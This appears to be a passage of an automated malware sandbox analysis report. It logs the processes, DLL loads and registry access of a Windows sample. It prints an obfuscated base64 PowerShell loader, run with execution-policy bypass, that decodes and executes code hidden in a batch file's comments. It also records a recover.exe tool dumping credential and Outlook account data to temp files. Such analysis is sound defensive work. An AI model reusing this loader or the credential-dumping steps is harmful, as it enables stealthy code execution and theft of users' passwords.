mlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZH

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm			Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,

12_2_004053E1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10002806 push ecx; ret	5_2_10002819
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04E042D7 push ebx; ret	5_2_04E042DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0763CB5C push eax; retf	5_2_0763CB5D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00446B75 push ecx; ret	12_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00452BB4 push eax; ret	12_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044DDB0 push eax; ret	12_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044DDB0 push eax; ret	12_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044B090 push eax; ret	13_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044B090 push eax; ret	13_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00451D34 push eax; ret	13_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00444E71 push ecx; ret	13_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414060 push eax; ret	16_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414060 push eax; ret	16_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414039 push ecx; ret	16_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004164EB push 0000006Ah; retf	16_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00416553 push 0000006Ah; retf	16_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00416555 push 0000006Ah; retf	16_2_004165C4

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

13_2_004047CB

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
